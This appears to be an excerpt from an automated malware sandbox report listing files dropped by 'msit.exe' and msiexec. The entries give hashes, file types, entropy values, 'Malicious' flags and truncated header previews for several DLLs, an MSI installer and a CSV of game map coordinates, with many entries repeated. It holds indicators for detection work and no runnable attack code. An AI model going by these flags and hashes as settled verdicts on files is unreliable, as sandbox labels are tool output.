                                                                                                              SHA-512:18E49E56AD2F78DB7F4BFABAB25CC3ECFCC8180BEEA8FF162A5D80BD0A6DB9EB598F9FA1D5167F078A12F382663A2B205D7E512370E4873A60955A174826E8E3
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...<..<..<..}?..<..}9...<.x?..<.x8..<..}8..<.x9...<..}:..<..}=..<..=...<..y5...<..y<..<..y...<.....<..y>..<.Rich..<.................PE..L......f.........."!...)............0W..............................................g.....@A.........................................p..h...............`=..............p...............................@.......................@....................text...j........................... ..`.rdata... ......."..................@..@.data...('... ......................@....didat..H....P......................@....fptable.....`......................@....rsrc...h....p......................@..@.reloc..............................@..B................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\msit.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):908128
                                                                                                              Entropy (8bit):6.595002426238024
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:0yuK7uUCx0bzy5UrkfbDUtF4h0lhSMXlpGyFI/Yk6ibf7:0yuHHUtTZGyFI/Yk6ibf7
                                                                                                              MD5:ACCD9092A35E468E8AF934ACCD81E9F6
                                                                                                              SHA1:3751384E5E586481618002469190E3C1F271CE6D
                                                                                                              SHA-256:8339A5EE92E53A155828E58E7700FC17D4F3F8ECB11DAEB52AA1118BA3141ECD
                                                                                                              SHA-512:18E49E56AD2F78DB7F4BFABAB25CC3ECFCC8180BEEA8FF162A5D80BD0A6DB9EB598F9FA1D5167F078A12F382663A2B205D7E512370E4873A60955A174826E8E3
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...<..<..<..}?..<..}9...<.x?..<.x8..<..}8..<.x9...<..}:..<..}=..<..=...<..y5...<..y<..<..y...<.....<..y>..<.Rich..<.................PE..L......f.........."!...)............0W..............................................g.....@A.........................................p..h...............`=..............p...............................@.......................@....................text...j........................... ..`.rdata... ......."..................@..@.data...('... ......................@....didat..H....P......................@....fptable.....`......................@....rsrc...h....p......................@..@.reloc..............................@..B................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\msit.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):908128
                                                                                                              Entropy (8bit):6.595002426238024
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:0yuK7uUCx0bzy5UrkfbDUtF4h0lhSMXlpGyFI/Yk6ibf7:0yuHHUtTZGyFI/Yk6ibf7
                                                                                                              MD5:ACCD9092A35E468E8AF934ACCD81E9F6
                                                                                                              SHA1:3751384E5E586481618002469190E3C1F271CE6D
                                                                                                              SHA-256:8339A5EE92E53A155828E58E7700FC17D4F3F8ECB11DAEB52AA1118BA3141ECD
                                                                                                              SHA-512:18E49E56AD2F78DB7F4BFABAB25CC3ECFCC8180BEEA8FF162A5D80BD0A6DB9EB598F9FA1D5167F078A12F382663A2B205D7E512370E4873A60955A174826E8E3
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...<..<..<..}?..<..}9...<.x?..<.x8..<..}8..<.x9...<..}:..<..}=..<..=...<..y5...<..y<..<..y...<.....<..y>..<.Rich..<.................PE..L......f.........."!...)............0W..............................................g.....@A.........................................p..h...............`=..............p...............................@.......................@....................text...j........................... ..`.rdata... ......."..................@..@.data...('... ......................@....didat..H....P......................@....fptable.....`......................@....rsrc...h....p......................@..@.reloc..............................@..B................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\msit.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):908128
                                                                                                              Entropy (8bit):6.595002426238024
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:0yuK7uUCx0bzy5UrkfbDUtF4h0lhSMXlpGyFI/Yk6ibf7:0yuHHUtTZGyFI/Yk6ibf7
                                                                                                              MD5:ACCD9092A35E468E8AF934ACCD81E9F6
                                                                                                              SHA1:3751384E5E586481618002469190E3C1F271CE6D
                                                                                                              SHA-256:8339A5EE92E53A155828E58E7700FC17D4F3F8ECB11DAEB52AA1118BA3141ECD
                                                                                                              SHA-512:18E49E56AD2F78DB7F4BFABAB25CC3ECFCC8180BEEA8FF162A5D80BD0A6DB9EB598F9FA1D5167F078A12F382663A2B205D7E512370E4873A60955A174826E8E3
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...<..<..<..}?..<..}9...<.x?..<.x8..<..}8..<.x9...<..}:..<..}=..<..=...<..y5...<..y<..<..y...<.....<..y>..<.Rich..<.................PE..L......f.........."!...)............0W..............................................g.....@A.........................................p..h...............`=..............p...............................@.......................@....................text...j........................... ..`.rdata... ......."..................@..@.data...('... ......................@....didat..H....P......................@....fptable.....`......................@....rsrc...h....p......................@..@.reloc..............................@..B................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\msit.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):908128
                                                                                                              Entropy (8bit):6.595002426238024
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:0yuK7uUCx0bzy5UrkfbDUtF4h0lhSMXlpGyFI/Yk6ibf7:0yuHHUtTZGyFI/Yk6ibf7
                                                                                                              MD5:ACCD9092A35E468E8AF934ACCD81E9F6
                                                                                                              SHA1:3751384E5E586481618002469190E3C1F271CE6D
                                                                                                              SHA-256:8339A5EE92E53A155828E58E7700FC17D4F3F8ECB11DAEB52AA1118BA3141ECD
                                                                                                              SHA-512:18E49E56AD2F78DB7F4BFABAB25CC3ECFCC8180BEEA8FF162A5D80BD0A6DB9EB598F9FA1D5167F078A12F382663A2B205D7E512370E4873A60955A174826E8E3
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...<..<..<..}?..<..}9...<.x?..<.x8..<..}8..<.x9...<..}:..<..}=..<..=...<..y5...<..y<..<..y...<.....<..y>..<.Rich..<.................PE..L......f.........."!...)............0W..............................................g.....@A.........................................p..h...............`=..............p...............................@.......................@....................text...j........................... ..`.rdata... ......."..................@..@.data...('... ......................@....didat..H....P......................@....fptable.....`......................@....rsrc...h....p......................@..@.reloc..............................@..B................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\msit.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):908128
                                                                                                              Entropy (8bit):6.595002426238024
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:0yuK7uUCx0bzy5UrkfbDUtF4h0lhSMXlpGyFI/Yk6ibf7:0yuHHUtTZGyFI/Yk6ibf7
                                                                                                              MD5:ACCD9092A35E468E8AF934ACCD81E9F6
                                                                                                              SHA1:3751384E5E586481618002469190E3C1F271CE6D
                                                                                                              SHA-256:8339A5EE92E53A155828E58E7700FC17D4F3F8ECB11DAEB52AA1118BA3141ECD
                                                                                                              SHA-512:18E49E56AD2F78DB7F4BFABAB25CC3ECFCC8180BEEA8FF162A5D80BD0A6DB9EB598F9FA1D5167F078A12F382663A2B205D7E512370E4873A60955A174826E8E3
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...<..<..<..}?..<..}9...<.x?..<.x8..<..}8..<.x9...<..}:..<..}=..<..=...<..y5...<..y<..<..y...<.....<..y>..<.Rich..<.................PE..L......f.........."!...)............0W..............................................g.....@A.........................................p..h...............`=..............p...............................@.......................@....................text...j........................... ..`.rdata... ......."..................@..@.data...('... ......................@....didat..H....P......................@....fptable.....`......................@....rsrc...h....p......................@..@.reloc..............................@..B................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\msit.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):908128
                                                                                                              Entropy (8bit):6.595002426238024
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:0yuK7uUCx0bzy5UrkfbDUtF4h0lhSMXlpGyFI/Yk6ibf7:0yuHHUtTZGyFI/Yk6ibf7
                                                                                                              MD5:ACCD9092A35E468E8AF934ACCD81E9F6
                                                                                                              SHA1:3751384E5E586481618002469190E3C1F271CE6D
                                                                                                              SHA-256:8339A5EE92E53A155828E58E7700FC17D4F3F8ECB11DAEB52AA1118BA3141ECD
                                                                                                              SHA-512:18E49E56AD2F78DB7F4BFABAB25CC3ECFCC8180BEEA8FF162A5D80BD0A6DB9EB598F9FA1D5167F078A12F382663A2B205D7E512370E4873A60955A174826E8E3
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...<..<..<..}?..<..}9...<.x?..<.x8..<..}8..<.x9...<..}:..<..}=..<..=...<..y5...<..y<..<..y...<.....<..y>..<.Rich..<.................PE..L......f.........."!...)............0W..............................................g.....@A.........................................p..h...............`=..............p...............................@.......................@....................text...j........................... ..`.rdata... ......."..................@..@.data...('... ......................@....didat..H....P......................@....fptable.....`......................@....rsrc...h....p......................@..@.reloc..............................@..B................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:CSV text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):740
                                                                                                              Entropy (8bit):5.1730907895834575
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:QzVUXp7bIsbbUpD3SO9X8J3M87h9rBqkJYa3fixhiGVnsNRkZOQUA/F9At5wUniO:QzSZosuD3S7J377NqkJuhiGKRkwA3Atd
                                                                                                              MD5:DBA29B1CC6A0AC337A02A1B600E59E60
                                                                                                              SHA1:EFEFF3878B981326DA4C70BE8F9396F0B6020247
                                                                                                              SHA-256:9331EA0E713C45E2439D7D12709FDD0E1528137C0EF89AE96FB03150D0D9A5DE
                                                                                                              SHA-512:E67A41BEC75514ECB47EF2B0FE477CB2240CE9254D1656488F1F0E83B86E43E32B316F9DEDA9A67E731773928F9479CF80DABCEFE88C99AC1F7DE5DCA795109E
                                                                                                              Malicious:false
                                                                                                              Preview:Intro;V(X=340931.38, Y=666722.19, Z=409.60);R(0)..Start_02;V(X=367538.00, Y=595014.00, Z=212.17);R(0)..OldBridge_Hut;V(X=362269.19, Y=589130.19, Z=750.27);R(0)..Zalissya;V(X=401922.22, Y=549398.50, Z=698.31);R(0)..SW_Church;V(X=761943.12, Y=712179.81, Z=2849.92);R(0)..SW_EastTower;V(X=743126.25, Y=764860.44, Z=1989.11);R(0)..SW_FishingFarm;V(X=767872.62, Y=732877.50, Z=1384.00);R(0)..SW_Pumping;V(X=743319.88, Y=736860.38, Z=1887.85);R(0)..SW_ClearSky;V(X=783729.06, Y=756685.00, Z=1621.93);R(0)..SW_BurntFarm;V(X=737051.75, Y=709953.06, Z=1781.97);R(0)..SW_NorthTower;V(X=761805.69, Y=726109.50, Z=1428.26);R(0)..ART_MUSEUM;V(X=1007865.62, Y=36386.11, Z=61790.83);R(Y=348.64)..Rostok;V(X=317827.750000,Y=415159.250000,Z=702.566772);R(0)
                                                                                                              Process:C:\Users\user\Desktop\msit.exe
                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5038592
                                                                                                              Entropy (8bit):6.043058205786219
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:vVkDvLSkqdbEsuV+ebMh8w+/H8pF/bmlEyGjWvcP1xQ+X7TqVAMPLfQyim8kznsY:2Ll+Mn0WHl9VA2ic/
                                                                                                              MD5:11F7419009AF2874C4B0E4505D185D79
                                                                                                              SHA1:451D8D0470CEDB268619BA1E7AE78ADAE0EBA692
                                                                                                              SHA-256:AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95
                                                                                                              SHA-512:1EABBBFDF579A93BBB055B973AA3321FC8DC8DA1A36FDE2BA9A4D58E5751DC106A4A1BBC4AD1F425C082702D6FBB821AA1078BC5ADC6B2AD1B5CE12A68058805
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.D!...!...!...(.V.C...5..."...5...&...5...)...!......5...:...5... ...5...R...5.:. ...5... ...Rich!...................PE..d...p............." .........D...............................................`M.....'.M...`A........................................@.H.L&....I......@K.H.....I..............@M.....`J:.p.......................(....%..............@.......$.H......................text...4B.......D.................. ..`.wpp_sf.....`.......H.............. ..`.rdata...L*......N*.................@..@.data...hD...PI......*I.............@....pdata........I......2I.............@..@.didat.......0K.......J.............@....rsrc...H....@K.......J.............@..@.reloc.......@M.. ....L.............@..B........................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\msit.exe
                                                                                                              File Type:CSV text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):740
                                                                                                              Entropy (8bit):5.1730907895834575
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:QzVUXp7bIsbbUpD3SO9X8J3M87h9rBqkJYa3fixhiGVnsNRkZOQUA/F9At5wUniO:QzSZosuD3S7J377NqkJuhiGKRkwA3Atd
                                                                                                              MD5:DBA29B1CC6A0AC337A02A1B600E59E60
                                                                                                              SHA1:EFEFF3878B981326DA4C70BE8F9396F0B6020247
                                                                                                              SHA-256:9331EA0E713C45E2439D7D12709FDD0E1528137C0EF89AE96FB03150D0D9A5DE
                                                                                                              SHA-512:E67A41BEC75514ECB47EF2B0FE477CB2240CE9254D1656488F1F0E83B86E43E32B316F9DEDA9A67E731773928F9479CF80DABCEFE88C99AC1F7DE5DCA795109E
                                                                                                              Malicious:false
                                                                                                              Preview:Intro;V(X=340931.38, Y=666722.19, Z=409.60);R(0)..Start_02;V(X=367538.00, Y=595014.00, Z=212.17);R(0)..OldBridge_Hut;V(X=362269.19, Y=589130.19, Z=750.27);R(0)..Zalissya;V(X=401922.22, Y=549398.50, Z=698.31);R(0)..SW_Church;V(X=761943.12, Y=712179.81, Z=2849.92);R(0)..SW_EastTower;V(X=743126.25, Y=764860.44, Z=1989.11);R(0)..SW_FishingFarm;V(X=767872.62, Y=732877.50, Z=1384.00);R(0)..SW_Pumping;V(X=743319.88, Y=736860.38, Z=1887.85);R(0)..SW_ClearSky;V(X=783729.06, Y=756685.00, Z=1621.93);R(0)..SW_BurntFarm;V(X=737051.75, Y=709953.06, Z=1781.97);R(0)..SW_NorthTower;V(X=761805.69, Y=726109.50, Z=1428.26);R(0)..ART_MUSEUM;V(X=1007865.62, Y=36386.11, Z=61790.83);R(Y=348.64)..Rostok;V(X=317827.750000,Y=415159.250000,Z=702.566772);R(0)
                                                                                                              Process:C:\Users\user\Desktop\msit.exe
                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {EA6270CA-0126-4785-A430-33ABC9DC920B}, Number of Words: 8, Subject: msit, Author: msit, Name of Creating Application: msit, Template: x64;1033, Comments: This installer database contains the logic and data required to install msit., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Fri Dec 13 04:07:47 2024, Last Saved Time/Date: Fri Dec 13 04:07:47 2024, Last Printed: Fri Dec 13 04:07:47 2024, Number of Pages: 450
                                                                                                              Category:dropped
                                                                                                              Size (bytes):49342976
                                                                                                              Entropy (8bit):6.869504787159507
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:786432:WzwqNUHytvnMdfw6FVUrUl7eOuTt3aOTZ:6iStvnMRw+VUrUl7eOmlaOTZ
                                                                                                              MD5:71B30F6890F9ECF0FABBF1CBBC2427F8
                                                                                                              SHA1:41C12ABEDF033CA0E5D0114520B40F4160A20029
                                                                                                              SHA-256:5FE2CD05A7CD3783644E141058408F08427F02DDBA6B7BC4220F191A43523A85
                                                                                                              SHA-512:2968E78F4FF28A77B2A6013D70774FED98DF3B0CC6496F5D937CF046F37825027E4C2832F9342F0FD61EEFDA89DD4E1067FD602B9056D9B893BE8D0F10628BE1
                                                                                                              Malicious:false
                                                                                                              Preview:......................>.......................................................L.......e.......u...........................................................................................................................................................................................................................................................................................................................................................................................................................................................%...9........................................................................................... ...!..."...#...$.../...1...'...(...)...*...+...,...-...........0...2...7...3...4...5...6...:...8...A...D...;...<...=...>...?...@...K...B...C.......E...F...G...H...I...J...............N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                              Process:C:\Users\user\Desktop\msit.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):740
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3::
                                                                                                              MD5:8A6C6015821A7B3E6CEA958B2A6C18FB
                                                                                                              SHA1:0B5C28D4C54D84B26E8C55D9D8D5597F75B04568
                                                                                                              SHA-256:AD9484F24235FDAC13BBA66E24D5ECC16B72C6DE9BD27A3922F60833FE07679D
                                                                                                              SHA-512:F776F99B5D0E1C89E3F21AADD4A95C1D1F69396AAEA98439261C313CCE1EED81205046E6B628910AEABC8964194E3B19767CB368692BAE6579790EC91141C109
                                                                                                              Malicious:false
                                                                                                              Preview:....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {EA6270CA-0126-4785-A430-33ABC9DC920B}, Number of Words: 8, Subject: msit, Author: msit, Name of Creating Application: msit, Template: x64;1033, Comments: This installer database contains the logic and data required to install msit., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Fri Dec 13 04:07:47 2024, Last Saved Time/Date: Fri Dec 13 04:07:47 2024, Last Printed: Fri Dec 13 04:07:47 2024, Number of Pages: 450
                                                                                                              Category:dropped
                                                                                                              Size (bytes):49342976
                                                                                                              Entropy (8bit):6.869504787159507
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:786432:WzwqNUHytvnMdfw6FVUrUl7eOuTt3aOTZ:6iStvnMRw+VUrUl7eOmlaOTZ
                                                                                                              MD5:71B30F6890F9ECF0FABBF1CBBC2427F8
                                                                                                              SHA1:41C12ABEDF033CA0E5D0114520B40F4160A20029
                                                                                                              SHA-256:5FE2CD05A7CD3783644E141058408F08427F02DDBA6B7BC4220F191A43523A85
                                                                                                              SHA-512:2968E78F4FF28A77B2A6013D70774FED98DF3B0CC6496F5D937CF046F37825027E4C2832F9342F0FD61EEFDA89DD4E1067FD602B9056D9B893BE8D0F10628BE1
                                                                                                              Malicious:false
                                                                                                              Preview:......................>.......................................................L.......e.......u...........................................................................................................................................................................................................................................................................................................................................................................................................................................................%...9........................................................................................... ...!..."...#...$.../...1...'...(...)...*...+...,...-...........0...2...7...3...4...5...6...:...8...A...D...;...<...=...>...?...@...K...B...C.......E...F...G...H...I...J...............N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1021792
                                                                                                              Entropy (8bit):6.608380087035959
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                                                              MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                                                              SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                                                              SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                                                              SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1021792
                                                                                                              Entropy (8bit):6.608380087035959
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                                                              MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                                                              SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                                                              SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                                                              SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1021792
                                                                                                              Entropy (8bit):6.608380087035959
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                                                              MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                                                              SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                                                              SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                                                              SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1021792
                                                                                                              Entropy (8bit):6.608380087035959
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                                                              MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                                                              SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                                                              SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                                                              SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1201504
                                                                                                              Entropy (8bit):6.4558508565404535
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:h4FsQxRqkY1ngOktwC2Tec+4VGWSlnH/YrjPWqTIUGFUrHtAkJMsFUh29BKjxm:a2QxNwCsec+4VGWSlnfYvOjUGFUrHtA2
                                                                                                              MD5:03CC8828BB0E0105915B7695B1EC8D88
                                                                                                              SHA1:CBF8EC531EA7E3EE58B51BD642F8BFABDC759EE1
                                                                                                              SHA-256:0E1491AE7344F3A5EC824732648CCDDA19B271D6F01471793BF292840FC83B5E
                                                                                                              SHA-512:593A76166EB6CE2E3537B0D93E216DAEF12E4AB5B181A194B55A90B39A1AF2E0374C4EC3833A000530425319A003CD1A648489640FCCAF108061EBEA1D9CB1E7
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............@G..@G..@G.yCF..@G.yEF..@G.|CF..@G.|DF..@G.|EF..@G.yDF..@G.yAF..@G..AG..@G.}IF..@G.}@F..@G.}.G..@G...G..@G.}BF..@GRich..@G........PE..L...v..f.........."!...).~..........Pq.......................................`............@A........................ ...t...............................`=.......l......p........................... ...@...............L............................text...J}.......~.................. ..`.rdata...;.......<..................@..@.data...............................@....fptable............................@....rsrc...............................@..@.reloc...l.......n..................@..B........................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1021792
                                                                                                              Entropy (8bit):6.608380087035959
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                                                                                              MD5:EC6EBF65FE4F361A73E473F46730E05C
                                                                                                              SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                                                                                              SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                                                                                              SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
